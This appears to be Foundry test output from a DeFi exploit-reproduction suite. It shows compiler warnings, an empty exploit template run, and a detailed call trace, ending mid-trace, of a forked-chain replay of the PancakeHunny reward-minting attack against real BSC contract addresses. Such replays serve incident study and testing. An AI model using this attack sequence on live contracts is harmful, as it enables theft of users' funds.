Compiling 21 files with Solc 0.8.28
Compiling 20 files with Solc 0.8.10
Solc 0.8.28 finished in 930.19ms
Solc 0.8.10 finished in 1.08s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.03s (1.37ms CPU time)

Ran 1 test for src/test/2021-06/PancakeHunny_exp.sol:ContractTest
[PASS] testExploit() (gas: 1079540)
Logs:
  Swap cake, Cake Balance: 119.761914966454802925
  Hunny Balance: 10420.334114419164281600
  Swap WBNB, WBEB Balance: 5.752000000000000000

Traces:
  [1354691] ContractTest::testExploit()
    ├─ [23974] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::deposit{value: 5752000000000000000}()
    │   ├─ emit Deposit(dst: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 5752000000000000000 [5.752e18])
    │   ├─  storage changes:
    │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000004fd335864c0c0000
    │   └─ ← [Stop]
    ├─ [23162] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 5752000000000000000 [5.752e18])
    │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 5752000000000000000 [5.752e18])
    │   └─ ← [Return] true
    ├─ [108720] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactETHForTokens{value: 5752000000000000000}(0, [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1622687689 [1.622e9])
    │   ├─ [2893] 0x0eD7e52944161450477ee417DE9Cd3a859b14fD0::getReserves() [staticcall]
    │   │   └─ ← [Return] 19244421191052594198292386 [1.924e25], 921966626842733667773738 [9.219e23], 1622687086 [1.622e9]
    │   ├─ [23974] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::deposit{value: 5752000000000000000}()
    │   │   ├─ emit Deposit(dst: 0x10ED43C718714eb63d5aA57B78B54704E256024E, wad: 5752000000000000000 [5.752e18])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0 → 0x0000000000000000000000000000000000000000000000004fd335864c0c0000
    │   │   └─ ← [Stop]
    │   ├─ [8062] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0x0eD7e52944161450477ee417DE9Cd3a859b14fD0, 5752000000000000000 [5.752e18])
    │   │   ├─ emit Transfer(from: 0x10ED43C718714eb63d5aA57B78B54704E256024E, to: 0x0eD7e52944161450477ee417DE9Cd3a859b14fD0, value: 5752000000000000000 [5.752e18])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0x0000000000000000000000000000000000000000000000004fd335864c0c0000 → 0
    │   │   │   @ 0x774456c48aa6871068b68c947f132b492bb302d48e494377f521bc0164db1c16: 0x00000000000000000000000000000000000000000000c33be93694ecb7456d2a → 0x00000000000000000000000000000000000000000000c33c3909ca7303516d2a
    │   │   └─ ← [Return] true
    │   ├─ [56376] 0x0eD7e52944161450477ee417DE9Cd3a859b14fD0::swap(119761914966454802925 [1.197e20], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [29983] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 119761914966454802925 [1.197e20])
    │   │   │   ├─ emit Transfer(from: 0x0eD7e52944161450477ee417DE9Cd3a859b14fD0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 119761914966454802925 [1.197e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x26c7faedc5f781c850550111a557f0e9b314f97941ed3fdb3f53337d6f8b55e7: 0x0000000000000000000000000000000000000000000feb2a29c60cffe58f27a2 → 0x0000000000000000000000000000000000000000000feb23abbe41dd097b8db5
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x0000000000000000000000000000000000000000000000067e07cb22dc1399ed
    │   │   │   └─ ← [Return] true
    │   │   ├─ [531] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::balanceOf(0x0eD7e52944161450477ee417DE9Cd3a859b14fD0) [staticcall]
    │   │   │   └─ ← [Return] 19244301429137627743489461 [1.924e25]
    │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x0eD7e52944161450477ee417DE9Cd3a859b14fD0) [staticcall]
    │   │   │   └─ ← [Return] 921972378842733667773738 [9.219e23]
    │   │   ├─ emit Sync(reserve0: 19244301429137627743489461 [1.924e25], reserve1: 921972378842733667773738 [9.219e23])
    │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 0, amount1In: 5752000000000000000 [5.752e18], amount0Out: 119761914966454802925 [1.197e20], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 8: 0x60b83d6e00000000c33be93694ecb7456d2a0000000feb2a29c60cffe58f27a2 → 0x60b83d6e00000000c33c3909ca7303516d2a0000000feb23abbe41dd097b8db5
    │   │   └─ ← [Stop]
    │   └─ ← [Return] [5752000000000000000 [5.752e18], 119761914966454802925 [1.197e20]]
    ├─ [531] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 119761914966454802925 [1.197e20]
    ├─ emit log_named_decimal_uint(key: "Swap cake, Cake Balance", val: 119761914966454802925 [1.197e20], decimals: 18)
    ├─ [25183] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::transfer(0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, 59880957483227401400 [5.988e19])
    │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, value: 59880957483227401400 [5.988e19])
    │   ├─  storage changes:
    │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000067e07cb22dc1399ed → 0x0000000000000000000000000000000000000000000000033f03e5916e09cd35
    │   │   @ 0xdf45ddc70d62cb4b58c4ed53f8879b7041093f770b0a37aa2de90f632ca6586e: 0 → 0x0000000000000000000000000000000000000000000000033f03e5916e09ccb8
    │   └─ ← [Return] true
    ├─ [0] VM::startPrank(0x515Fb5a7032CdD688B292086cf23280bEb9E31B6)
    │   └─ ← [Return]
    ├─ [998250] 0x12180BB36DdBce325b3be0c087d61Fce39b8f5A4::getReward()
    │   ├─ [2531] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::balanceOf(0x12180BB36DdBce325b3be0c087d61Fce39b8f5A4) [staticcall]
    │   │   └─ ← [Return] 0
    │   ├─ [205743] 0x0fCd52FD40B77E28062cf9889Dc3779C31c171fE::withdraw(947056504 [9.47e8])
    │   │   ├─ [4761] 0x73feaa1eE314F8c655E354234017bE2193C9E24E::userInfo(0, 0x0fCd52FD40B77E28062cf9889Dc3779C31c171fE) [staticcall]
    │   │   │   └─ ← [Return] 16497919378495714627 [1.649e19], 44678848320342009741493349 [4.467e25]
    │   │   ├─ [2531] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::balanceOf(0x0fCd52FD40B77E28062cf9889Dc3779C31c171fE) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [531] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::balanceOf(0x0fCd52FD40B77E28062cf9889Dc3779C31c171fE) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [127605] 0x73feaa1eE314F8c655E354234017bE2193C9E24E::leaveStaking(950689188 [9.506e8])
    │   │   │   ├─ [2531] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::balanceOf(0x73feaa1eE314F8c655E354234017bE2193C9E24E) [staticcall]
    │   │   │   │   └─ ← [Return] 126397340034340824520409635 [1.263e26]
    │   │   │   ├─ [17042] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::mint(0x8488Cb2f54Ecb9AA1cdc1bC83bc1D200BB2f216b, 1000000000000000000 [1e18])
    │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x8488Cb2f54Ecb9AA1cdc1bC83bc1D200BB2f216b, value: 1000000000000000000 [1e18])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xc9e0d69868394a548135a0ee3d584842352015c6e58fb14a2f4f404d1986e853: 0x00000000000000000000000000000000000000000000309457775e9aa9871d80 → 0x0000000000000000000000000000000000000000000030946558154e50eb1d80
    │   │   │   │   │   @ 3: 0x00000000000000000000000000000000000000000107da70f1cfe8d2444d6b48 → 0x00000000000000000000000000000000000000000107da70ffb09f85ebb16b48
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [10242] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::mint(0x009cF7bC57584b7998236eff51b98A168DceA9B0, 10000000000000000000 [1e19])
    │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x009cF7bC57584b7998236eff51b98A168DceA9B0, value: 10000000000000000000 [1e19])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 3: 0x00000000000000000000000000000000000000000107da70ffb09f85ebb16b48 → 0x00000000000000000000000000000000000000000107da718a77c28a75996b48
    │   │   │   │   │   @ 0x8b58e4adfdc7645d01ba998a972e8a5d1d52a5cff86f9099e2dfb087a1ef5c93: 0x000000000000000000000000000000000000000000017727700f0179e206b1d7 → 0x000000000000000000000000000000000000000000017727fad6247e6beeb1d7
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [29344] 0x009cF7bC57584b7998236eff51b98A168DceA9B0::safeCakeTransfer(0x0fCd52FD40B77E28062cf9889Dc3779C31c171fE, 2610465783260 [2.61e12])
    │   │   │   │   ├─ [531] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::balanceOf(0x009cF7bC57584b7998236eff51b98A168DceA9B0) [staticcall]
    │   │   │   │   │   └─ ← [Return] 1771624928769271520997847 [1.771e24]
    │   │   │   │   ├─ [23183] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::transfer(0x0fCd52FD40B77E28062cf9889Dc3779C31c171fE, 2610465783260 [2.61e12])
    │   │   │   │   │   ├─ emit Transfer(from: 0x009cF7bC57584b7998236eff51b98A168DceA9B0, to: 0x0fCd52FD40B77E28062cf9889Dc3779C31c171fE, value: 2610465783260 [2.61e12])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x8b58e4adfdc7645d01ba998a972e8a5d1d52a5cff86f9099e2dfb087a1ef5c93: 0x000000000000000000000000000000000000000000017727fad6247e6beeb1d7 → 0x000000000000000000000000000000000000000000017727fad6221ea00bf3fb
    │   │   │   │   │   │   @ 0xe270c383ad7bc85335d49ae216d2f23be0710f4ceb8cd3d520badf2ed72b0301: 0 → 0x0000000000000000000000000000000000000000000000000000025fcbe2bddc
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [6083] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::transfer(0x0fCd52FD40B77E28062cf9889Dc3779C31c171fE, 950689188 [9.506e8])
    │   │   │   │   ├─ emit Transfer(from: 0x73feaa1eE314F8c655E354234017bE2193C9E24E, to: 0x0fCd52FD40B77E28062cf9889Dc3779C31c171fE, value: 950689188 [9.506e8])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x0c458e8fc5c9a23334273a721326662ae5ff6a29ef2f35b59260149f2f45f088: 0x000000000000000000000000000000000000000000688dad8878003613c54223 → 0x000000000000000000000000000000000000000000688dad88780035db1ae47f
    │   │   │   │   │   @ 0xe270c383ad7bc85335d49ae216d2f23be0710f4ceb8cd3d520badf2ed72b0301: 0x0000000000000000000000000000000000000000000000000000025fcbe2bddc → 0x00000000000000000000000000000000000000000000000000000260048d1b80
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [15183] 0x009cF7bC57584b7998236eff51b98A168DceA9B0::burn(0x0fCd52FD40B77E28062cf9889Dc3779C31c171fE, 950689188 [9.506e8])
    │   │   │   │   ├─ emit Transfer(from: 0x0fCd52FD40B77E28062cf9889Dc3779C31c171fE, to: 0x0000000000000000000000000000000000000000, value: 950689188 [9.506e8])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xe270c383ad7bc85335d49ae216d2f23be0710f4ceb8cd3d520badf2ed72b0301: 0x000000000000000000000000000000000000000000000000e4f46243d8453543 → 0x000000000000000000000000000000000000000000000000e4f462439f9ad79f
    │   │   │   │   │   @ 3: 0x000000000000000000000000000000000000000000bef3fb65fc6759fda7c5eb → 0x000000000000000000000000000000000000000000bef3fb65fc6759c4fd6847
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Withdraw(user: 0x0fCd52FD40B77E28062cf9889Dc3779C31c171fE, pid: 0, amount: 950689188 [9.506e8])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xa66cc928b5edb82af9bd49922954155ab7b0942694bea4ce44661d9a8736c68b: 0x00000000000000000000000000000000000000000000000025954883e275db4f → 0x00000000000000000000000000000000000000000000000025954883e277105a
    │   │   │   │   @ 0xa66cc928b5edb82af9bd49922954155ab7b0942694bea4ce44661d9a8736c68a: 0x0000000000000000000000000000000000000000000000000000000000797ee1 → 0x0000000000000000000000000000000000000000000000000000000000797ee2
    │   │   │   │   @ 0xe270c383ad7bc85335d49ae216d2f23be0710f4ceb8cd3d520badf2ed72b0301: 0 → 0x00000000000000000000000000000000000000000000000000000260048d1b80
    │   │   │   │   @ 0x89f66805d84199fb0c19ab9860ada5ad5c832fbad8eb8e12e816bbda64e315b0: 0x00000000000000000000000000000000000000000024f51d387cbb5a1446c465 → 0x00000000000000000000000000000000000000000024f51d38739821ea75481e
    │   │   │   │   @ 0x89f66805d84199fb0c19ab9860ada5ad5c832fbad8eb8e12e816bbda64e315af: 0x000000000000000000000000000000000000000000000000e4f46243d8453543 → 0x000000000000000000000000000000000000000000000000e4f462439f9ad79f
    │   │   │   └─ ← [Stop]
    │   │   ├─ [23183] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::transfer(0x12180BB36DdBce325b3be0c087d61Fce39b8f5A4, 950689188 [9.506e8])
    │   │   │   ├─ emit Transfer(from: 0x0fCd52FD40B77E28062cf9889Dc3779C31c171fE, to: 0x12180BB36DdBce325b3be0c087d61Fce39b8f5A4, value: 950689188 [9.506e8])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xe270c383ad7bc85335d49ae216d2f23be0710f4ceb8cd3d520badf2ed72b0301: 0x00000000000000000000000000000000000000000000000000000260048d1b80 → 0x0000000000000000000000000000000000000000000000000000025fcbe2bddc
    │   │   │   │   @ 0xc0a343b72aa1eb9f58369254c3281e096ca74e855aa9846c3752e22ac3831474: 0 → 0x0000000000000000000000000000000000000000000000000000000038aa5da4
    │   │   │   └─ ← [Return] true
    │   │   ├─ [531] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::balanceOf(0x0fCd52FD40B77E28062cf9889Dc3779C31c171fE) [staticcall]
    │   │   │   └─ ← [Return] 2610465783260 [2.61e12]
    │   │   ├─ [21053] 0x73feaa1eE314F8c655E354234017bE2193C9E24E::enterStaking(2610465783260 [2.61e12])
    │   │   │   ├─ [10794] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::transferFrom(0x0fCd52FD40B77E28062cf9889Dc3779C31c171fE, 0x73feaa1eE314F8c655E354234017bE2193C9E24E, 2610465783260 [2.61e12])
    │   │   │   │   ├─ emit Transfer(from: 0x0fCd52FD40B77E28062cf9889Dc3779C31c171fE, to: 0x73feaa1eE314F8c655E354234017bE2193C9E24E, value: 2610465783260 [2.61e12])
    │   │   │   │   ├─ emit Approval(owner: 0x0fCd52FD40B77E28062cf9889Dc3779C31c171fE, spender: 0x73feaa1eE314F8c655E354234017bE2193C9E24E, value: 115792089237316195423570985008687907853269984665640564039438462619774003266865 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xe270c383ad7bc85335d49ae216d2f23be0710f4ceb8cd3d520badf2ed72b0301: 0x0000000000000000000000000000000000000000000000000000025fcbe2bddc → 0
    │   │   │   │   │   @ 0x0c458e8fc5c9a23334273a721326662ae5ff6a29ef2f35b59260149f2f45f088: 0x000000000000000000000000000000000000000000688dad88780035db1ae47f → 0x000000000000000000000000000000000000000000688dad88780295a6fda25b
    │   │   │   │   │   @ 0x97d7f93473d73bed7db96ede90ce38beb8ae4f2e30a4fc8c85f1e7441b3dbc02: 0xfffffffffffffffffffffffffffffffffffffffffffffffef6a3312bcee4030d → 0xfffffffffffffffffffffffffffffffffffffffffffffffef6a32ecc03014531
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [3420] 0x009cF7bC57584b7998236eff51b98A168DceA9B0::mint(0x0fCd52FD40B77E28062cf9889Dc3779C31c171fE, 2610465783260 [2.61e12])
    │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x0fCd52FD40B77E28062cf9889Dc3779C31c171fE, value: 2610465783260 [2.61e12])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 3: 0x000000000000000000000000000000000000000000bef3fb65fc6759c4fd6847 → 0x000000000000000000000000000000000000000000bef3fb65fc69b990e02623
    │   │   │   │   │   @ 0xe270c383ad7bc85335d49ae216d2f23be0710f4ceb8cd3d520badf2ed72b0301: 0x000000000000000000000000000000000000000000000000e4f462439f9ad79f → 0x000000000000000000000000000000000000000000000000e4f464a36b7d957b
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Deposit(user: 0x0fCd52FD40B77E28062cf9889Dc3779C31c171fE, pid: 0, amount: 2610465783260 [2.61e12])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x89f66805d84199fb0c19ab9860ada5ad5c832fbad8eb8e12e816bbda64e315af: 0x000000000000000000000000000000000000000000000000e4f462439f9ad79f → 0x000000000000000000000000000000000000000000000000e4f464a36b7d957b
    │   │   │   │   @ 0x89f66805d84199fb0c19ab9860ada5ad5c832fbad8eb8e12e816bbda64e315b0: 0x00000000000000000000000000000000000000000024f51d38739821ea75481e → 0x00000000000000000000000000000000000000000024f51d9a8fa000fcb0a059
    │   │   │   │   @ 0x97d7f93473d73bed7db96ede90ce38beb8ae4f2e30a4fc8c85f1e7441b3dbc02: 0xfffffffffffffffffffffffffffffffffffffffffffffffef6a3312bcee4030d → 0xfffffffffffffffffffffffffffffffffffffffffffffffef6a32ecc03014531
    │   │   │   └─ ← [Stop]
    │   │   ├─  storage changes:
    │   │   │   @ 0xc0a343b72aa1eb9f58369254c3281e096ca74e855aa9846c3752e22ac3831474: 0 → 0x0000000000000000000000000000000000000000000000000000000038aa5da4
    │   │   │   @ 0x97cedf7ade476136a30be6f5276e01bbdcc9382fa0ee7bec558eb2815cf7788e: 0x000000000000000000000000000000000000000000000000c23a711fca9dd477 → 0x000000000000000000000000000000000000000000000000c23a711f922ae4ff
    │   │   │   @ 5: 0x000000000000000000000000000000000000000000000000e4146b716d6bf121 → 0x000000000000000000000000000000000000000000000000e4146b7134f901a9
    │   │   └─ ← [Stop]
    │   ├─ [531] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::balanceOf(0x12180BB36DdBce325b3be0c087d61Fce39b8f5A4) [staticcall]
    │   │   └─ ← [Return] 950689188 [9.506e8]
    │   ├─ [10466] 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300::isMinter(0x12180BB36DdBce325b3be0c087d61Fce39b8f5A4) [staticcall]
    │   │   ├─ [2495] 0x565b72163f17849832A692A3c5928cc502f46D69::getOwner() [staticcall]
    │   │   │   └─ ← [Return] 0x000000000000000000000000109ea28dbdea5e6ec126fbc8c33845dfe812a300
    │   │   └─ ← [Return] true
    │   ├─ [2801] 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300::performanceFee(950689188 [9.506e8]) [staticcall]
    │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000001735c
    │   ├─ [692198] 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300::mintFor(0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82, 0, 95068 [9.506e4], 0x515Fb5a7032CdD688B292086cf23280bEb9E31B6, 1622686342 [1.622e9])
    │   │   ├─ [495] 0x565b72163f17849832A692A3c5928cc502f46D69::getOwner() [staticcall]
    │   │   │   └─ ← [Return] 0x000000000000000000000000109ea28dbdea5e6ec126fbc8c33845dfe812a300
    │   │   ├─ [10794] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::transferFrom(0x12180BB36DdBce325b3be0c087d61Fce39b8f5A4, 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, 95068 [9.506e4])
    │   │   │   ├─ emit Transfer(from: 0x12180BB36DdBce325b3be0c087d61Fce39b8f5A4, to: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, value: 95068 [9.506e4])
    │   │   │   ├─ emit Approval(owner: 0x12180BB36DdBce325b3be0c087d61Fce39b8f5A4, spender: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, value: 115792089237316195423570985008687907853269984665640564039457583961798815922821 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xc0a343b72aa1eb9f58369254c3281e096ca74e855aa9846c3752e22ac3831474: 0x0000000000000000000000000000000000000000000000000000000038aa5da4 → 0x0000000000000000000000000000000000000000000000000000000038a8ea48
    │   │   │   │   @ 0x93fd85791eada3b3e36d9a986473e62d54022f35e6d820ed3f3b5a35549fdc10: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffd60f2cb7ade1 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffd60f2cb63a85
    │   │   │   │   @ 0xdf45ddc70d62cb4b58c4ed53f8879b7041093f770b0a37aa2de90f632ca6586e: 0x0000000000000000000000000000000000000000000000033f03e5916e09ccb8 → 0x0000000000000000000000000000000000000000000000033f03e5916e0b4014
    │   │   │   └─ ← [Return] true
    │   │   ├─ [531] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::balanceOf(0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300) [staticcall]
    │   │   │   └─ ← [Return] 59880957483227496468 [5.988e19]
    │   │   ├─ [4686] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 0)
    │   │   │   ├─ emit Approval(owner: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 0)
    │   │   │   └─ ← [Return] true
    │   │   ├─ [594] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::allowance(0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, 0x10ED43C718714eb63d5aA57B78B54704E256024E) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [22486] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 29940478741613748234 [2.994e19])
    │   │   │   ├─ emit Approval(owner: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 29940478741613748234 [2.994e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x17239108d5f646f045d6f80a9d28e8ca393e20b435a2a83b607e84361b201bb2: 0 → 0x0000000000000000000000000000000000000000000000019f81f2c8b705a00a
    │   │   │   └─ ← [Return] true
    │   │   ├─ [123989] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokens(29940478741613748234 [2.994e19], 0, [0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0x565b72163f17849832A692A3c5928cc502f46D69], 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, 1622687086 [1.622e9])
    │   │   │   ├─ [893] 0x0eD7e52944161450477ee417DE9Cd3a859b14fD0::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 19244301429137627743489461 [1.924e25], 921972378842733667773738 [9.219e23], 1622687086 [1.622e9]
    │   │   │   ├─ [2893] 0x36118142F8C21a1F3fd806D4A34F56f51F33504F::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 4007269601943522209004015 [4.007e24], 1763928134703263874339 [1.763e21], 1622687080 [1.622e9]
    │   │   │   ├─ [5994] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::transferFrom(0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, 0x0eD7e52944161450477ee417DE9Cd3a859b14fD0, 29940478741613748234 [2.994e19])
    │   │   │   │   ├─ emit Transfer(from: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, to: 0x0eD7e52944161450477ee417DE9Cd3a859b14fD0, value: 29940478741613748234 [2.994e19])
    │   │   │   │   ├─ emit Approval(owner: 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 0)
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xdf45ddc70d62cb4b58c4ed53f8879b7041093f770b0a37aa2de90f632ca6586e: 0x0000000000000000000000000000000000000000000000033f03e5916e0b4014 → 0x0000000000000000000000000000000000000000000000019f81f2c8b705a00a
    │   │   │   │   │   @ 0x17239108d5f646f045d6f80a9d28e8ca393e20b435a2a83b607e84361b201bb2: 0x0000000000000000000000000000000000000000000000019f81f2c8b705a00a → 0
    │   │   │   │   │   @ 0x26c7faedc5f781c850550111a557f0e9b314f97941ed3fdb3f53337d6f8b55e7: 0x0000000000000000000000000000000000000000000feb23abbe41dd097b8db5 → 0x0000000000000000000000000000000000000000000feb254b4034a5c0812dbf
    │   │   │   │   └─ ← [Return] true
